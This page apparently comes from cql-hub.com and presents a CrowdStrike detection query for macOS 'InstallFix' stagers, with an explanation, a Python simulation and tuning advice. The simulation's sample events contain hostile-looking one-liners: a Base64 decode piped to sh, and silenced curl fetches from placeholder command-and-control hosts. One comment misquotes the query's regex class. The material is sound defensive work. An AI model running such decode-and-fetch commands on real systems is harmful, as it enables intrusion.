
InstallFix on macOS

The InstallFix query catches the execution pattern of one-liner stagers and initial-access scripts that masquerade as system fixes or installers. It looks for a high-confidence sequence on a single host (same aid): a command that decodes Base64, followed within one minute by a curl command that fetches an http(s) URL with a cluster of flags typically used to silence output or skip checks (k, s, f, L, as in -fsSL). A silenced curl on its own is common in legitimate installer one-liners; it is the nearby Base64 decode that raises confidence. Because the query sets sequence=true with Base64Decode listed first, the decode must occur before the curl: a curl that runs first and pipes into base64 -d afterwards is not matched as written.

Tags: EDR, detection, T1140 (Deobfuscate/Decode Files or Information), T1059.004 (Command and Scripting Interpreter: Unix Shell)
Data source: FDR. Level: intermediate. By Szymon Kozicki (cql-hub.com). 1 min read.

Query

// Scope: macOS process-execution events from the Falcon sensor repository
#repo="base_sensor"
| #event_simpleName="ProcessRollup2"
| event_platform="Mac"
| correlate(
  // First subquery: a Base64 decode on the command line (base64 -d or base64 -D).
  // The long form "base64 --decode" does not match this pattern.
  Base64Decode: {
    #event_simpleName="ProcessRollup2"
    | CommandLine=/(?i)base64\s+-(d|D)/
  } include:[aid],

  // Second subquery: curl fetching an http(s) URL with a run of at least four
  // flag letters from k, s, f, l (for example -fsSL, -sSfL, -kfsL), plus a
  // Falcon process-tree link built from aid and TargetProcessId.
  SuspiciousCurl: {
    #event_simpleName="ProcessRollup2"
    | CommandLine=/(?i)curl\s+.*https?:\/\//
    | CommandLine=/(?i)curl\s+-[a-z]*[kfls]{4,}/
    // Adjust rootURL to your Falcon cloud (us-2 is hardcoded here)
    | rootURL := "https://falcon.us-2.crowdstrike.com/"
    | format("[Tree](%sgraphs/process-explorer/tree?id=pid:%s:%s)", field=["rootURL", "aid", "TargetProcessId"], as="URL")
  } include:[ComputerName, UserName, aid, CommandLine, URL],
  within=1m,                   // both events no more than one minute apart
  sequence=true,               // Base64Decode must precede SuspiciousCurl
  globalConstraints=[aid],     // both events from the same sensor
  includeMatchesOnceOnly=true  // each event contributes to at most one result
)
// Lift the curl-side fields out of the subquery for the final table
| ComputerName := SuspiciousCurl.ComputerName
| aid          := SuspiciousCurl.aid
| @timestamp   := SuspiciousCurl.@timestamp
| Tree         := SuspiciousCurl.URL
| UserName     := SuspiciousCurl.UserName
| Curl_CMD     := SuspiciousCurl.CommandLine
| table([@timestamp, UserName, ComputerName, aid, Tree, Curl_CMD])

Explanation

Imported from cql-hub.com.

The first three pipes restrict the search to macOS process-execution events (ProcessRollup2) in the base_sensor repository.

correlate() defines two named subqueries. Base64Decode matches command lines that contain base64 -d or base64 -D. SuspiciousCurl matches command lines that invoke curl against an http(s) URL with a run of at least four flag letters from k, s, f, l (such as -fsSL), and uses format() to build a Falcon process-explorer link from rootURL, aid and TargetProcessId. The include: lists name the fields each subquery carries into the result.

within=1m, sequence=true and globalConstraints=[aid] require both events to come from the same sensor, in the listed order (decode first, then curl), no more than one minute apart. includeMatchesOnceOnly=true stops a single decode or curl event from appearing in several correlation results.

The trailing assignments copy the curl-side fields (timestamp, user, host, aid, tree link, command line) out of the SuspiciousCurl subquery so that table() can display them.
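To see what the correlation does and does not catch, here is an offline Python simulation of the query's logic over a handful of constructed ProcessRollup2 events. This is an added example, not the cql-hub query and not CrowdStrike code: the event dictionaries, host names, aids and .invalid URLs are made up, and the pairing loop is a hand-written approximation of correlate() with within, sequence, globalConstraints and includeMatchesOnceOnly. It reproduces the page's two regexes and the process-tree link, and shows the sequence-order and --decode cases that the query misses.

```python
"""Offline simulation of the InstallFix correlate() logic over constructed
ProcessRollup2 events. Added example, not the cql-hub query or CrowdStrike code."""
import re
from datetime import datetime, timedelta

# Patterns mirroring the page's two subqueries. [kfls] is the same class as the
# page's [ksfls]; (?i) makes -fsSL, -sSfL and -kfsl all count as a four-flag run.
BASE64_DECODE = re.compile(r"(?i)base64\s+-(d|D)")
CURL_URL = re.compile(r"(?i)curl\s+.*https?://")
CURL_FLAGS = re.compile(r"(?i)curl\s+-[a-z]*[kfls]{4,}")
ROOT_URL = "https://falcon.us-2.crowdstrike.com/"   # same hardcoded cloud as the query


def is_base64_decode(cmd: str) -> bool:
    return BASE64_DECODE.search(cmd) is not None


def is_suspicious_curl(cmd: str) -> bool:
    return CURL_URL.search(cmd) is not None and CURL_FLAGS.search(cmd) is not None


def tree_url(aid: str, pid: str, root: str = ROOT_URL) -> str:
    """Same markdown link the query's format() pipe emits."""
    return f"[Tree]({root}graphs/process-explorer/tree?id=pid:{aid}:{pid})"


def correlate(events, within_seconds=60, sequence=True, once_only=True):
    """Pair each SuspiciousCurl event with a Base64Decode event from the same aid
    (globalConstraints=[aid]) no more than within_seconds apart. sequence=True
    means the decode must come first, as Base64Decode is listed first in the
    query. once_only mirrors includeMatchesOnceOnly: an event joins one result."""
    within = timedelta(seconds=within_seconds)
    mac_pr2 = [e for e in events
               if e["event_simpleName"] == "ProcessRollup2" and e["event_platform"] == "Mac"]
    by_aid = {}
    for ev in sorted(mac_pr2, key=lambda e: e["timestamp"]):
        by_aid.setdefault(ev["aid"], []).append(ev)
    results = []
    for aid, evs in by_aid.items():
        decodes = [e for e in evs if is_base64_decode(e["CommandLine"])]
        curls = [e for e in evs if is_suspicious_curl(e["CommandLine"])]
        consumed = set()
        for c in curls:
            for d in decodes:
                if once_only and id(d) in consumed:
                    continue
                gap = c["timestamp"] - d["timestamp"]   # positive: decode happened first
                if sequence and gap < timedelta(0):
                    continue
                if abs(gap) > within:
                    continue
                results.append({
                    "timestamp": c["timestamp"], "UserName": c["UserName"],
                    "ComputerName": c["ComputerName"], "aid": aid,
                    "Tree": tree_url(aid, c["TargetProcessId"]),
                    "Curl_CMD": c["CommandLine"], "Decode_CMD": d["CommandLine"],
                })
                consumed.add(id(d))
                break   # this curl event is used once


    return results


def _ev(aid, host, ts, cmd, pid="4242"):
    """Build one constructed ProcessRollup2 event; ts is (minute, second) past 10:00."""
    return {"event_simpleName": "ProcessRollup2", "event_platform": "Mac", "aid": aid,
            "ComputerName": host, "UserName": "user", "TargetProcessId": pid,
            "timestamp": datetime(2024, 1, 1, 10, *ts), "CommandLine": cmd}


# Constructed sample telemetry (not real Falcon data); .invalid hosts never resolve.
SAMPLE_EVENTS = [
    # host-a: decode, then a silenced curl 20 s later -> fires
    _ev("aid-a", "host-a", (0, 0), "sh -c 'echo aGk= | base64 -d | sh'"),
    _ev("aid-a", "host-a", (0, 20), "curl -fsSL https://dl.example.invalid/fix.sh"),
    # host-b: installer-style curl with no decode -> no match
    _ev("aid-b", "host-b", (5, 0), "curl -fsSL https://get.example.invalid/install.sh"),
    # host-c: curl first, decode 30 s later -> missed because of sequence=true
    _ev("aid-c", "host-c", (10, 0), "curl -sSfL https://cdn.example.invalid/blob"),
    _ev("aid-c", "host-c", (10, 30), "base64 -D -i blob -o stage2"),
    # host-d: decode and curl 5 min apart -> outside within=1m
    _ev("aid-d", "host-d", (20, 0), "base64 -d payload.b64"),
    _ev("aid-d", "host-d", (25, 0), "curl -kfsL https://c2.example.invalid/a"),
    # host-e: long-form --decode is not matched by the page's regex
    _ev("aid-e", "host-e", (30, 0), "base64 --decode payload.b64"),
    _ev("aid-e", "host-e", (30, 10), "curl -fsSL https://c2.example.invalid/b"),
]

if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print(hit["timestamp"], hit["ComputerName"], hit["Curl_CMD"], hit["Tree"])
```

Run as written, only host-a is reported. Passing sequence=False also surfaces host-c, and within_seconds=600 also surfaces host-d; host-e stays invisible until the decode regex is widened to accept --decode. The same three knobs are what you would tune in the CQL query itself.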

Variables to adjust

Review and adjust the values to your environment.

#repo="base_sensor": the repository that holds your Falcon sensor events.

rootURL: the query hardcodes https://falcon.us-2.crowdstrike.com/; set it to your Falcon cloud so the Tree links resolve.

within=1m: widen it if your stagers decode and fetch further apart; a wider window admits more legitimate installer activity.

The curl flag class and its {4,} count: the query only flags runs of at least four letters from k, s, f, l. Lower the count or add letters to catch shorter flag clusters, at the cost of more benign installer hits.